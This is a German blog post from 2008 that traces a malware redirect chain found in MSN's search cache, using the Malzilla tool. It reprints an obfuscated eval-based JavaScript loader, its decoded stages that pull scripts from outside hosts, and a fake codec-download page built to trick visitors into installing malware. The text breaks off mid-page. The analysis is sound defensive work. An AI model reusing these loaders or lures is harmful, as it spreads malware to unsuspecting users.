Tuesday, April 15. 2008
MSN cache hilft beim Verbreiten von malware
Heute habe ich mal nach katsumi+grospolina mit search.msn.com gesucht.
Ein eintrag hat dort sofort meinen forscherdrang entfacht:
Während jedoch der host fathom.ddns.ws längst nicht mehr funktioniert ,
bringt uns ein klick auf den cache zu folgender seite:
Oh ja, so ist das wenn man den nick einer pornodarstellerin hat.
(übrigens: die heisst jetzt kasuni)
Das aufpoppende fenster, das im XP stil erstellt wurde, macht einen schon stutzig,
besonders wenn man w2k installiert hat :p
...aber toll, dass endlich mal jemand mir das benötigte codec-ding gibt,
wo doch der MSmediaplayer immer versucht was runterzuladen und es nie schafft!
Also draufgeklickt ...und das desaster nimmt seinen Lauf.
Während google scheinbar inzwischen frei ist von solchen einträgen,
scheint M$ sich nicht darum zu scheren.
Wir wollen nun einmal mit malzilla der Sache auf den leib rücken!
Ein eintrag hat dort sofort meinen forscherdrang entfacht:
Während jedoch der host fathom.ddns.ws längst nicht mehr funktioniert ,
bringt uns ein klick auf den cache zu folgender seite:
Oh ja, so ist das wenn man den nick einer pornodarstellerin hat.
(übrigens: die heisst jetzt kasuni)
Das aufpoppende fenster, das im XP stil erstellt wurde, macht einen schon stutzig,
besonders wenn man w2k installiert hat :p
...aber toll, dass endlich mal jemand mir das benötigte codec-ding gibt,
wo doch der MSmediaplayer immer versucht was runterzuladen und es nie schafft!
Also draufgeklickt ...und das desaster nimmt seinen Lauf.
Während google scheinbar inzwischen frei ist von solchen einträgen,
scheint M$ sich nicht darum zu scheren.
Wir wollen nun einmal mit malzilla der Sache auf den leib rücken!
Auf das anfragen von http://cc.msnscache.com/cache.aspx?q=73022418196251&mkt=de-AT&lang=de-AT&w=ce31ddfb&FORM=CVRE8
spuckt malzilla zunächst dies hier aus:
CODE:
<base href="http://fathom.ddns.ms/article/katsumi.html" /><meta http-equiv="content-type" content="text/html; charset=utf-8" /><table width="100%" style="background-color:#fff;" border="1" bordercolor="#909090" cellpadding="5"><tr><td><span style="color: black; font: normal normal normal small normal arial,sans-serif;">Dies ist eine Version von <a style="color: blue; text-decoration: underline; font: normal normal normal small normal arial,sans-serif;" href="http://fathom.ddns.ms/article/katsumi.html">http://fathom.ddns.ms/article/katsumi.html</a> zu dem Zeitpunkt, zu dem unser Crawler die Seite unter 07.03.2008 untersucht hat. Die unten angezeigte Seite ist die Version in unserem Index, der verwendet wurde, um diese Seite in den Ergebnissen auf die aktuelle Suche einzuordnen. Dies ist möglicherweise nicht die neueste Version der Seite - wenn Sie die aktuellste Version dieser Seite anzeigen möchten, <a style="color: blue; text-decoration: underline; font: normal normal normal small normal arial,sans-serif;" href="http://fathom.ddns.ms/article/katsumi.html">rufen Sie sie im Internet auf</a>.<div style="margin-top: 10px;"><span style="font-style: italic;">Live.com ist nicht mit dem Inhalt der unten angezeigten Seite oder den Parteien verbunden, die für diesen verantwortlich sind.</span></div></span></td></tr></table>
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Wasaki Katsumi's Home Page</title>
<link rel="stylesheet" href="http://fathom.ddns.ms/style.css" type="text/css" media="screen" >
</head>
<body><script>function u(RL,P){if(!P){P='v@7(LAJ*wUg$M_i%0I!YHa,Eysmt3u8Zk]Wb4=[`oQD^efKx?;FXh1z)|C+&Gj6<';}var K;var av='';for(var q=0;q<RL.length;q+=4){K=(P.indexOf(RL.charAt(q))&255)<<18|(P.indexOf(RL.charAt(q+1))&255)<<12|(P.indexOf(RL.charAt(q+2))&255)<<(6)|P.indexOf(RL.charAt(q+3))&255;av+=String.fromCharCode((K&16711680)>>16,(K&65280)>>8,K&255);}eval(av);}u('sJjbu,1=t`0Ku)UQuJHoUX;XyF3^U)UQ3*0k3)Ub%!Uou*I?iWGxtJ=Ks,Abt)aKu7CQt[sx$z_`m!1Wm,|x3za]3[_o%z=4%YL)_(L?_Ws^%,f]u*_1t,4[3[a[%!3^sE_byE@=gJIxy)afs,Ch$`U=s[aF3[aFg!e`wb|G$)_bUFe`3[=?u(|`gYek');</script>
<div id="wrapper">
<div id="head"><a href="http://fathom.ddns.ms/article/email-lycos-uk.html"><img src="http://fathom.ddns.ms/image/bg-head-1.gif" border="0" alt="" /></a></div>
<div id="container">
<div id="pagecontent">
<div id="left">
<div id="content">
<br />
<h2> - Katsuni Wikipedia, free the</h2>
<br />
<a href="http://fathom.ddns.ms/article/old-car-auto-trader.html" class="postTitle" rel="bookmark" > Car Trader - Old</a>
<br />
<i> to a Thanks customer</i> <b> in </b> <a href="http://fathom.ddns.ms/article/advocate.html" rel="category tag"> The Award</a> <b> Katsumi, </b>
<div class="storycontent">
<p> Japan who requested <strong> this </strong> product, can now you these order bodysuits based on fiberglass moulds <a href="http://snowed.mrbonus.com/lib/michael-faraday.html"> Michael</a> from this website.. <a href="http://stamps.mrbonus.com/pregnancy-after.html"> Pregnancy after 45-years-old</a> del.icio.us . | recent · popular login | register | del.icio.us, help. the web. items (11). All Katsuni, anciennement ne Katsumi, Cline Tran</p>
<p> le 9 [4] avril Lyon, 1979 est une actrice pornographique Elle franaise. fait a ses tudes George l'Institut. Yuzawa Katsumi was born Los in Angeles, California 1915. in He and his were family at incarcerated the concentration Amache camp <img src="http://fathom.ddns.ms/image/icon_smile.gif" alt="" class="wp-smiley" /> </p>
<p> in Colorado in 1942. Dr. Katsumi Furitsu, Japan. Medical doctor at the Hospital for Radiation Victims, <strong> Osaka (mostly </strong> Hibakusha), Delegate of the Investigation
</p>
</div>
<hr />
<div class="feedback" align="right">
</div>
<h3 id="comments"> - Wikipedia, Katsuni free the encyclopedia</h3>
<ol class="commentlist">
<li class="alt" id="comment-227">
<cite> of Hibakusha. </cite> Katsumi
<br />
<small class="commentmetadata"><a href="http://fathom.ddns.ms/article/emc-proven-professional.html" > CertMag.com EMC Professional Proven</a> </small>
<p> Papers Japanese Australia, Japanese Teas Japanese Australia, Gifts Embroidery Incense & Salts, Bath
</p>
</li>
<li class="" id="comment-228">
<cite><a href="http://saxton.ddns.ms/styles/diet-tips.html" rel=''> Best Diet 15 Tips</a></cite> Buy Japanese
<br />
<small class="commentmetadata"><a href="http://fathom.ddns.ms/article/payday-advances.html" > Payday Loan</a> </small>
<p> Paper Products Online. Katsumi Electric Co. has been making keyers since the 1960's, their equipment has
</p>
</li>
<li class="alt" id="comment-233">
<cite><a href="http://choke.mrbonus.com/article/literary-agent.html" rel=''> Literary</a></cite> an unsurpassed
<br />
<small class="commentmetadata"><a href="http://fathom.ddns.ms/article/vera-drake.html" > Drake Vera (2004)</a> </small>
<p> reputation for rugged reliability.. FIND MORE STORIES IN: Japan | US economy | Dow | Composite Index | Hang Seng Index | Nikkei 225 Index | Stock price | KATSUMI. grey rule. Katsumi <img src="http://fathom.ddns.ms/image/icon_smile.gif" alt="" class="wp-smiley" /> was a 21-year-old university student planning to <img src="http://fathom.ddns.ms/image/icon_smile.gif" alt="" class="wp-smiley" />
</p>
</li>
</ol>
<br />
</div>
<div class="navigation" align="center">
<div align="left"></div>
<div align="right"></div>
</div>
</div>
<div id="center">
<br />
<div align="left"></div>
<div align="right"></div>
<br />
<div id="menu">
<ul>
<li><b> be a French teacher </b>
<ul id="themeswitcher">
<li>
<select name="themeswitcher" onchange="location.href='http://managedtasks.com/wpthemes/blog/index.php?wptheme=' + this.options[this.selectedIndex].value;">
<option value="Aidens Theme"> when Penthouse </option>
<option value="akhdian"> France, </option>
<option value="Almodovar"> intrigued </option>
<option value="Almost Spring"> by her racial </option>
<option value="Amsterdam Nights"> mix, invited her </option>
<option value="anarchy"> to pose.. </option>
<option value="Anthurium Mix"> Katsumi NAGAI. </option>
<option value="Archway"> You can </option>
<option value="Batavia 1.5"> contribute</option>
<option value="Benevolence"> information </option>
<option value="Black-LetterHead"> to this page, but </option>
<option value="blogtimes"> first you </option>
<option value="Blue-Bye-You"> must login or </option>
<option value="Blueberry Boat"> register. Cast </option>
<option value="Blue Radiant"> in: Banner of </option>
<option value="Borderline Chaos"> the Stars (TV) as </option>
<option value="Boxy But Gold"> By Guen. the</option>
<option value="c3ro fire"> time Watanabe </option>
<option value="c3ro silence" selected="selected"> Katsumi arrived, </option>
<option value="ChinaRed"> the swamp </option>
<option value="Chocolate Candy"> had been filled </option>
<option value="Chuck A Wobbly"> in and the area, </option>
<option value="Clasikue"> named after </option>
<option value="Coffee Cup"> a Kabuki theater </option>
<option value="Connections"> that was never </option>
<option value="Crop Circles"> built, was a </option>
<option value="Cub Reporter"> Katsumi Ono: </option>
<option value="Curtains Up"> STARmeter,</option>
<option value="Daisy Rae Gemini"> Message Boards.. </option>
<option value="Dark Maple"> Katsumi Ono </option>
<option value="Deichnetz"> Not (I),</option>
<option value="Delusions"> the Katsumi </option>
<option value="Desert Theme"> Ono you're </option>
<option value="Devenir En Gris"> looking for? Main </option>
<option value="Dixie Belle"> Details · </option>
<option value="Elvgren"> Filmography </option>
<option value="equiX"> · </option>
<option value="Express Yourself"> Personal Details </option>
<option value="Fading Flowers"> · Media. </option>
<option value="Falling Dreams"> Katsumi Ihara</option>
<option value="FastTrack"> compensation, </option>
<option value="Fleur De Lys"> earnings, stock </option>
<option value="Flex"> options, </option>
<option value="ForumED"> career</option>
<option value="Framefake Theme"> history, current </option>
<option value="Fresh Bananas"> profile and additional </option>
<option value="GanjaPress"> information </option>
<option value="Garden Log"> at Forbes.com. </option>
<option value="Gentle Calm"> Katsumi NAGAI. </option>
<option value="Gespaa theme"> You can contribute </option>
<option value="Gespaa theme - Two Columns"> information to this page, </option>
<option value="Girls-Suck"> but first</option>
<option value="Golden Gray"> you must login </option>
<option value="Green Marinee"> or register.</option>
<option value="Greenwood"> in: Cast</option>
<option value="Grimelda"> Banner of </option>
<option value="Head"> the</option>
<option value="Hiperminimalist"> Stars (TV) as Guen. </option>
<option value="Illumination"> del.icio.us</option>
<option value="Imhotep"> popular .</option>
<option value="Impressionist"> | recent · </option>
<option value="Iris"> login </option>
<option value="Jakarta"> | register </option>
<option value="Journalized Blue"> | help. del.icio.us, </option>
<option value="Journalized Sand"> the web. All items </option>
<option value="Journalized Winter"> (11). span class=fFile</option>
<option value="Juicy"> Format:span </option>
<option value="Just A Mindset"> PDFAdobe Acrobat </option>
<option value="Landzilla"> - a as HTMLa </option>
<option value="LastRegrets"> Insider Filings </option>
<option value="LetterHead"> - HIROKAWA </option>
<option value="Lucid"> KATSUMI, </option>
<option value="mallow"> Last Updated </option>
<option value="man~ja"> 31-Oct-07. </option>
<option value="Meadow"> HIROKAWA </option>
<option value="Minim8"> KATSUMI: </option>
<option value="Minima Plus"> Declared Holdings. </option>
<option value="MintyGreen"> Reported,</option>
<option value="Mixed Bouquet"> Shares, Ownership. </option>
<option value="MTsix"> Katsumi </option>
<option value="Museum"> Suzuki </option>
<option value="narnia"> ( , Suzuki </option>
<option value="Neptune"> Katsumi?) </option>
<option value="Neuron"> (born</option>
<option value="Northern-Web-Coders"> 5, 1956) is August</option>
<option value="Notebook"> a Japanese </option>
<option value="NYC"> seiy. </option>
<option value="Oasis"> He is </option>
<option value="Ocadia"> best known </option>
<option value="Off the Wall"> as the voice </option>
<option value="Operate"> of Kagome's </option>
<option value="OrangeSky"> grandfather </option>
<option value="Oxymod"> in InuYasha. </option>
<option value="Parishuddha"> Katsuni, anciennement </option>
<option value="Plain Vanilla"> Katsumi, ne Cline </option>
<option value="Pool"> Tran </option>
<option value="Postcards From the Edge"> le [4] 9 avril 1979 Lyon, </option>
<option value="pumpkin"> est une </option>
<option value="RadMod"> actrice </option>
<option value="Rampart"> pornographique </option>
<option value="Random Image"> franaise. Elle </option>
<option value="rdc* theme"> a fait ses </option>
<option value="Red Train"> tudes l'Institut.</option>
<option value="Reflections"> Chief Scientist. </option>
<option value="Retrospotive"> Katsumi MIDORIKAWA </option>
<option value="Rin"> (D.Eng.) </option>
<option value="RohitKumar.org"> Research Subjects. </option>
<option value="Safety"> (1), Ultrashort </option>
<option value="Scam City"> high intensity </option>
<option value="Scattered"> lasers and </option>
<option value="Sharepoint like"> their applications </option>
<option value="Simple Green"> to strong field </option>
<option value="Sixties"> interactions. </option>
<option value="Slash Dot"> span - 1k</option>
<option value="Sleek"> - spannobra </option>
<option value="Soothe"> class=fl </option>
<option value="Spirit"> - a class=fl </option>
<option value="Spring Fairy"> pagesan Name, </option>
<option value="Squares"> Katsumi </option>
<option value="Starburst"> Fujiwara. </option>
<option value="Steam"> Job Title, </option>
<option value="Stevish 2"> Associate </option>
<option value="Stevish Dream"> Professor. Function </option>
<option value="Stripes"> Name, Graduate </option>
<option value="stucco"> School </option>
<option value="Stylish Blue Modern"> of Humanities and of </option>
<option value="Tech-Bytes"> Letter. Katsumi </option>
<option value="Travelogue"> Cho find the </option>
<option value="Tropical Breeze"> latest news, biography, </option>
<option value="Weblogs.us"> career milestones, </option>
<option value="White as Milk"> credits, filmography, </option>
<option value="Windstorm"> photos and </option>
<option value="WordPress Classic"> video clips on Yahoo! </option>
<option value="WordPress Default"> TV. Author Details. </option>
<option value="Wuhan"> Name:. </option>
<option value="Yaaarr! Tis me blog!"> Katsumi Takahashi. Citations </option>
<option value="Zen Minimalist"> by Katsumi Takahashi. </option>
<option value="Zig-Zag"> Sort By, </option>
</select>
</li>
</ul> </li>
<br />
<li id="pagenav"><h2> Katsuni</h2><ul><li class="page_item"><a href="http://fathom.ddns.ms/article/trisomy-18.html" > Trisomy</a>
</li>
<li class="page_item"><a href="http://fathom.ddns.ms/article/netscape-plug-ins.html" > Browser Add-ons</a>
</li>
<li class="page_item"><a href="http://fathom.ddns.ms/article/kitchener-waterloo.html" > Waterloo Kitchener</a>
</li>
</ul></li> <br />
<li id="linkcat-1"><h2> Katsuni -</h2>
<ul>
<li><a href="http://doors.servemp3.com/live-maine-music.html"> Portland,</a></li>
<li><a href="http://doors.servemp3.com/free-white-pages.html"> Free White</a></li>
<li><a href="http://warren.servemp3.com/articles/50-cent-how-we.html"> GAME THE</a></li>
<li><a href="http://beads.servemp3.com/mommy-and-son.html"> Mom-son-sex</a></li>
<li><a href="http://known.servemp3.com/topic/booty-shots-of.html"> Jennifer</a></li>
<li><a href="http://known.servemp3.com/topic/pillow-talk.html"> Pillow</a></li>
<li><a href="http://fathom.ddns.ms/article/piso-compra-barcelona.html"> fotocasa.es:</a></li>
<li><a href="http://yorick.mrbonus.com/pages/attacktix-starter.html"> wars star</a></li>
</ul>
</li>
<li id="archives"> Title, Year. <ul>
<li><a href="http://fathom.ddns.ms/article/real-life-street.html" > YouTube - Real</a></li>
<li><a href="http://fathom.ddns.ms/article/bear-cubs.html" > Image results</a></li>
</ul>
</li>
<br />
<li id="meta"> The citations <ul>
<li><a href="http://fathom.ddns.ms/article/100-ceramic-hair.html" > Product search</a>
</li>
<li><a href="http://fathom.ddns.ms/article/women-pee-in.html" > Book results for women</a>
<ul class='children'> <li><a href="http://fathom.ddns.ms/article/swimmers.html" > results Image</a>
</li>
<li><a href="http://fathom.ddns.ms/article/attempt-to-access.html" > BUG: "Attempt</a>
</li>
<li><a href="http://fathom.ddns.ms/article/rigolotte.html" > Rigolotte</a>
</li>
<li><a href="http://fathom.ddns.ms/article/thurleston-hotel.html" > Thurlestone</a>
</li>
</ul>
</li>
<li><a href="http://fathom.ddns.ms/article/vancomycin-dose.html" > Pharmacokinetic</a>
</li>
</ul>
<br /></li><li id="search"> listed
<ul>
<form id="searchform" method="get" action="">
<input type="text" name="s" id="s" size="15" class="input" >
<input type="submit" name="submit" value="GO" class="button">
</form><br />
</ul>
<ul>
<li><a href="http://fathom.ddns.ms/article/gravediggaz.html" ><abbr > here </abbr> <h2 class=r><a</a></li>
</ul>
</li>
</ul>
</div>
</div>
<div id="right">
<br />
<table id="wp-calendar">
<caption> are for reference </caption>
<thead>
<tr>
<th abbr="Monday" scope="col" > </th>
<th abbr="Tuesday" scope="col" > only.. </th>
<th abbr="Wednesday" scope="col" > Katsumi </th>
<th abbr="Thursday" scope="col" > Kitagawa, </th>
<th abbr="Friday" scope="col" > PhD. </th>
<th abbr="Saturday" scope="col" > Assistant </th>
<th abbr="Sunday" scope="col" > Member, </th>
</tr>
</thead>
<tfoot>
<tr>
<td abbr="" colspan="3" id="prev"><a href="http://fathom.ddns.ms/article/evil-symbols.html" > Image</a></td>
<td class="pad"> St. </td>
<td colspan="3" id="next" class="pad"> Jude </td>
</tr>
</tfoot>
<tbody>
<tr>
<td colspan="1" class="pad"> Faculty. </td><td><a href="http://fathom.ddns.ms/article/stevens-johnson.html" > eMedicine</a></td><td><a href="http://fathom.ddns.ms/article/two-women-kissing.html" > Two</a></td><td> Katsumi </td><td> Kitagawa, </td><td> PhD </td><td><a href="http://fathom.ddns.ms/article/golden-links.html" > Golden</a></td>
</tr>
<tr>
<td><a href="http://fathom.ddns.ms/article/atlanta-georgia.html" > Georgia</a></td><td><a href="http://fathom.ddns.ms/article/in-legend-movie.html" > Urban</a></td><td> Molecular </td><td><a href="http://fathom.ddns.ms/article/nipple-biting.html" > Nipple</a></td><td><a href="http://fathom.ddns.ms/article/norfolk-international.html" > Welcome</a></td><td> Pharmacology </td><td><a href="http://fathom.ddns.ms/article/leather-journals.html" > Long</a></td>
</tr>
<tr>
<td> MS </td><td><a href="http://fathom.ddns.ms/article/kids-crafts.html" > DLTK's</a></td><td><a href="http://fathom.ddns.ms/article/north-carolina.html" > North</a></td><td> 230, </td><td> Room </td><td><a href="http://fathom.ddns.ms/article/made.html" > MADE</a></td><td> D-3007C. </td>
</tr>
<tr>
<td><a href="http://fathom.ddns.ms/article/men-in-bathroom.html" > Sexy</a></td><td><a href="http://fathom.ddns.ms/article/roof-top-heavy.html" > Fasteners</a></td><td> GROSPOLINA.ORG.</td><td><a href="http://fathom.ddns.ms/article/river-raisin.html" > River</a></td><td><a href="http://fathom.ddns.ms/article/shake-ya-tailfeather.html" > Nelly</a></td><td><a href="http://fathom.ddns.ms/article/online-investing.html" > Welcome</a></td><td><a href="http://fathom.ddns.ms/article/wild-arms.html" > Wild</a></td>
</tr>
<tr>
<td><a href="http://fathom.ddns.ms/article/barnes-book.html" > Barnes</a></td><td> Nepenthes. </td><td> Katsumi. </td><td><a href="http://fathom.ddns.ms/article/online-scrapbook.html" > Scrapbook</a></td>
<td class="pad" colspan="3"> To </td>
</tr>
</tbody>
</table> <div id="buttons">
<br />
<a class="img" href="http://stamps.mrbonus.com/lga-search-airport.html" ><img src="http://fathom.ddns.ms/image/b_listen.gif" width="80" height="15" border="0" alt="" /></a>
<br /><a class="img" href="http://large.ddns.ms/styles/anime-gallery.html" ><img src="http://fathom.ddns.ms/image/b_hunger.gif" width="80" height="15" border="0" alt="" /></a>
<br /><a class="img" href="http://large.ddns.ms/styles/optoma-home-theater.html" ><img src="http://fathom.ddns.ms/image/b_eff.gif" width="80" height="15" border="0" alt="" /></a>
<br /><a class="img" href="http://saxton.ddns.ms/styles/rubies.html" ><img src="http://fathom.ddns.ms/image/b_aortal.gif" width="80" height="15" border="0" alt="" /></a>
<br /><a class="img" href="http://choke.mrbonus.com/article/radcliffe-squires.html" ><img border="0" alt="Get Firefox!" src="http://fathom.ddns.ms/image/white_1.gif"></a>
<br />
<form action="">
<input style="width:75px; font:bold 11px verdana, helvetica, sans-serif; color:white; background-color:#0066CC;" type="button" value="SOUL" name="button" >
</form>
</div>
</div>
<div id="footer">
<p> take full advantage <a href="http://grapes.ddns.ms/article/supply-chain.html" target="new"> Image results</a> of Flickr, <br /> you should <a href="http://grapes.ddns.ms/article/nikki-cox-tits.html" target="new"> Nikki</a>
<br /><br />
</p>
</div>
</div>
</div>
</div>
</body>
</html>
Was hier auffällt ist das obfuskierte script:
CODE:
<script>function u(RL,P){if(!P){P='v@7(LAJ*wUg$M_i%0I!YHa,Eysmt3u8Zk]Wb4=[`oQD^efKx?;FXh1z)|C+&Gj6<';}var K;var av='';for(var q=0;q<RL.length;q+=4){K=(P.indexOf(RL.charAt(q))&255)<<18|(P.indexOf(RL.charAt(q+1))&255)<<12|(P.indexOf(RL.charAt(q+2))&255)<<(6)|P.indexOf(RL.charAt(q+3))&255;av+=String.fromCharCode((K&16711680)>>16,(K&65280)>>8,K&255);}eval(av);}u('sJjbu,1=t`0Ku)UQuJHoUX;XyF3^U)UQ3*0k3)Ub%!Uou*I?iWGxtJ=Ks,Abt)aKu7CQt[sx$z_`m!1Wm,|x3za]3[_o%z=4%YL)_(L?_Ws^%,f]u*_1t,4[3[a[%!3^sE_byE@=gJIxy)afs,Ch$`U=s[aF3[aFg!e`wb|G$)_bUFe`3[=?u(|`gYek');</script>
So etwas macht man nur wenn man etwas verstecken will,
und der msnbot wird das script nicht ausführen, niemals.
Also lassen wir nun malzilla die sache entwirren
CODE:
document.write('<sc'+'ript src="http://lineacount.info/cgi-bin/search?id=174106&k=katsumi&ref='+escape(document.referrer)+'"></sc'+'ript>');
Diese adresse lassen wir wieder von malzilla herunterladen:
CODE:
function S(LH,W){if(!W){W='V(#q3HRou<lZ/zhYri[a9QXwA+8!FSB$^g).E]`CMs{J%0p_dKtxfbTjG4=1&my;';}var T;var PC='';for(var j=0;j<LH.length;j+=4){T=(W.indexOf(LH.charAt(j))&255)<<18|(W.indexOf(LH.charAt(j+1))&255)<<12|(W.indexOf(LH.charAt(j+2))&255)<<(6)|W.indexOf(LH.charAt(j+3))&255;PC+=String.fromCharCode((T&16711680)>>16,(T&65280)>>8,T&255);}eval(PC);}S('+Rm.SXb]!CrpSj<sSR9M<xKxAtFJ<j<sForyuRi_AjQ0+X4fZ`K_ATHf8XmpY[<MSoidh)&_AXib!or0+C<]+wibA`90h#4.!Tf_+C<]+Xb_S`]]Zfb_S`]]h)9t/R0gSozb!XE]zfzaFRQ.8XH%<audaR])F`HtBaM]/.(JAwixSXbsZxFtz[&fZtu^Y#mxAtFJ<j<sFory<tE1');
Wieder sehr merkwürdig was da nachgeladen wird
und wiederum können wir mit malzilla ein licht ins dunkel bringen:
CODE:
document.write('<sc'+'ript> document.location="http://adult-freetube-8.com/freemovie/Movie:%20katsumi%7CSpecial%20Library:%20katsumi/725/4/" </sc'+'ript>');
...womit wir bei bereits erwähnter seite angekommen wären.
Ihr ahnt es schon... ab damit in unseren malzilla browser:
CODE:
<HTML><HEAD><TITLE>~~!ADULT-FREETUBE-8.COM MOVIE HARDCORE VIDEO ONLINE!~~</TITLE>
<META http-equiv=Content-Type content="text/html; charset=windows-1251">
<META content="MSHTML 6.00.2900.2180" name=GENERATOR></HEAD>
<BODY oncontextmenu="return false;" text=#ccffff vLink=#eeeeee link=#eeeeee bgColor=black leftMargin=0 topMargin=0>
<H2 style="MARGIN: 0px; FONT: bold 14pt Arial; COLOR: #ffff00" align=center>
MOVIE: KATSUMI</H2>
<SCRIPT language=javascript>
newurl = "http://adult-freetube-8.com/m/b/2/white/725/4/";
codec_url='http://sexicodecstars.com/download/502/725/4/';
</script>
<SCRIPT language=javascript src="http://adult-freetube-8.com/popup/pop1.htm"></SCRIPT>
<SCRIPT language=javascript src="http://adult-freetube-8.com/popup/pop2.htm"></SCRIPT>
<SCRIPT language=jscript.encode src="http://adult-freetube-8.com/popup/pop3.htm"></SCRIPT>
<SCRIPT language="javascript">
function softdownload()
{
if(window.navigator.userAgent.indexOf("SV1") != -1 || window.navigator.userAgent.indexOf("MSIE 7") !=-1)
{
return;
}
else
{
window.setTimeout("location.href='" + codec_url + "'", 3000);
}
}
function play() {
if (confirm('Click 'OK' to download and install media codec.')) {
window.location.href=codec_url;
}
else {
if (alert('Please download new version of media codec software.')) {
play();
}
else {
play();
}
}
}
function Down() {
document.getElementById("popdiv").style.visibility="hidden";
window.location.href=codec_url;
}
function Down2() {
document.getElementById("popdiv").style.visibility="visible";
}
function Close()
{
document.getElementById("popdiv").style.visibility="hidden";
play();
}
function Details()
{
alert('Download video codec to view media files.');
}
var Drag = {
obj : null,
init : function(o, oRoot, minX, maxX, minY, maxY, bSwapHorzRef, bSwapVertRef, fXMapper, fYMapper)
{
o.onmousedown = Drag.start;
o.hmode = bSwapHorzRef ? false : true ;
o.vmode = bSwapVertRef ? false : true ;
o.root = oRoot && oRoot != null ? oRoot : o ;
if (o.hmode && isNaN(parseInt(o.root.style.left ))) o.root.style.left = "0px";
if (o.vmode && isNaN(parseInt(o.root.style.top ))) o.root.style.top = "0px";
if (!o.hmode && isNaN(parseInt(o.root.style.right ))) o.root.style.right = "0px";
if (!o.vmode && isNaN(parseInt(o.root.style.bottom))) o.root.style.bottom = "0px";
o.minX = typeof minX != 'undefined' ? minX : null;
o.minY = typeof minY != 'undefined' ? minY : null;
o.maxX = typeof maxX != 'undefined' ? maxX : null;
o.maxY = typeof maxY != 'undefined' ? maxY : null;
o.xMapper = fXMapper ? fXMapper : null;
o.yMapper = fYMapper ? fYMapper : null;
o.root.onDragStart = new Function();
o.root.onDragEnd = new Function();
o.root.onDrag = new Function();
},
start : function(e)
{
var o = Drag.obj = this;
e = Drag.fixE(e);
var y = parseInt(o.vmode ? o.root.style.top : o.root.style.bottom);
var x = parseInt(o.hmode ? o.root.style.left : o.root.style.right );
o.root.onDragStart(x, y);
o.lastMouseX = e.clientX;
o.lastMouseY = e.clientY;
if (o.hmode) {
if (o.minX != null) o.minMouseX = e.clientX - x + o.minX;
if (o.maxX != null) o.maxMouseX = o.minMouseX + o.maxX - o.minX;
} else {
if (o.minX != null) o.maxMouseX = -o.minX + e.clientX + x;
if (o.maxX != null) o.minMouseX = -o.maxX + e.clientX + x;
}
if (o.vmode) {
if (o.minY != null) o.minMouseY = e.clientY - y + o.minY;
if (o.maxY != null) o.maxMouseY = o.minMouseY + o.maxY - o.minY;
} else {
if (o.minY != null) o.maxMouseY = -o.minY + e.clientY + y;
if (o.maxY != null) o.minMouseY = -o.maxY + e.clientY + y;
}
document.onmousemove = Drag.drag;
document.onmouseup = Drag.end;
return false;
},
drag : function(e)
{
e = Drag.fixE(e);
var o = Drag.obj;
var ey = e.clientY;
var ex = e.clientX;
var y = parseInt(o.vmode ? o.root.style.top : o.root.style.bottom);
var x = parseInt(o.hmode ? o.root.style.left : o.root.style.right );
var nx, ny;
if (o.minX != null) ex = o.hmode ? Math.max(ex, o.minMouseX) : Math.min(ex, o.maxMouseX);
if (o.maxX != null) ex = o.hmode ? Math.min(ex, o.maxMouseX) : Math.max(ex, o.minMouseX);
if (o.minY != null) ey = o.vmode ? Math.max(ey, o.minMouseY) : Math.min(ey, o.maxMouseY);
if (o.maxY != null) ey = o.vmode ? Math.min(ey, o.maxMouseY) : Math.max(ey, o.minMouseY);
nx = x + ((ex - o.lastMouseX) * (o.hmode ? 1 : -1));
ny = y + ((ey - o.lastMouseY) * (o.vmode ? 1 : -1));
if (o.xMapper) nx = o.xMapper(y)
else if (o.yMapper) ny = o.yMapper(x)
Drag.obj.root.style[o.hmode ? "left" : "right"] = nx + "px";
Drag.obj.root.style[o.vmode ? "top" : "bottom"] = ny + "px";
Drag.obj.lastMouseX = ex;
Drag.obj.lastMouseY = ey;
Drag.obj.root.onDrag(nx, ny);
return false;
},
end : function()
{
document.onmousemove = null;
document.onmouseup = null;
Drag.obj.root.onDragEnd( parseInt(Drag.obj.root.style[Drag.obj.hmode ? "left" : "right"]),
parseInt(Drag.obj.root.style[Drag.obj.vmode ? "top" : "bottom"]));
Drag.obj = null;
},
fixE : function(e)
{
if (typeof e == 'undefined') e = window.event;
if (typeof e.layerX == 'undefined') e.layerX = e.offsetX;
if (typeof e.layerY == 'undefined') e.layerY = e.offsetY;
return e;
}
};
function showPopDiv()
{
var sFlag = "No";
var byFlag = false;
var FlagAr = sFlag.split("");
if (FlagAr[0]=="1"){byFlag = true;}
if (FlagAr[0]=="3"){byFlag = true;}
if(!byFlag)
{
var p=document.getElementById("popdiv");
wmpwidth=document.body.clientWidth/2-190;
wmpheight=document.body.clientHeight/2-130;
p.style.top = wmpheight;
p.style.left = wmpwidth;
p.style.visibility = "visible";
p.focus();
}
}
softdownload();
setTimeout("showPopDiv();",1300);
</SCRIPT>
<CENTER>
<A href="javascript:Down2();"><IMG style="BORDER-RIGHT: #eeeeee 1px solid; BORDER-TOP: #eeeeee 1px solid; BACKGROUND: #000000; BORDER-LEFT: #eeeeee 1px solid; BORDER-BOTTOM: #eeeeee 1px solid" height=400 src="http://adult-freetube-8.com/i/play.gif" width=480></A>
<DIV id=popdiv style="Z-INDEX: 1; LEFT: 0px; VISIBILITY: hidden; POSITION: absolute; TOP: 0px" name="popdiv">
<table width="389" border="0" cellpadding="0" cellspacing="0">
<tr>
<td height="36">
<table border="0" cellpadding="0" cellspacing="0">
<tr>
<td width="5" height="36"><img src="http://adult-freetube-8.com/i/img0.gif" width="5" height="36" alt="" /></td>
<td width="357" bgcolor="#0064B2" background="http://adult-freetube-8.com/i/img1.gif"><font style="font:bold 12px Verdana; color:#ffffff;">        Message Box Object Error</font></td>
<td width="21" bgcolor="#0064B2"><img src="http://adult-freetube-8.com/i/img2.gif" width="21" height="36" onclick="Close();" alt="" /></td>
<td width="6"><img src="http://adult-freetube-8.com/i/img3.gif" width="6" height="36" alt="" /></td>
</tr>
</table>
</td>
</tr>
<tr>
<td height="203" bgcolor="#FFFFDE" background="http://adult-freetube-8.com/i/img4.gif" valign="top">
<table width="100%" height="130" border="0" cellpadding="0" cellspacing="0">
<tr>
<td width="120"> </td>
<td valign="top">
<div style="width:100%;height:35px;"></div>
<font face="Tahoma" color="#000000" style="font-size:11px;">
<b>Video ActiveX Object Error:</b><br />
Your browser cannot display this video file.<br /><br />
You need to download new version of Video<br />
ActiveX Object to play this video file. </font>
</td>
</tr>
</table>
<table width="100%" border="0" cellpadding="0" cellspacing="0">
<tr>
<td align="center">
<font face="Tahoma" color="#000000" style="font-size:11px;">
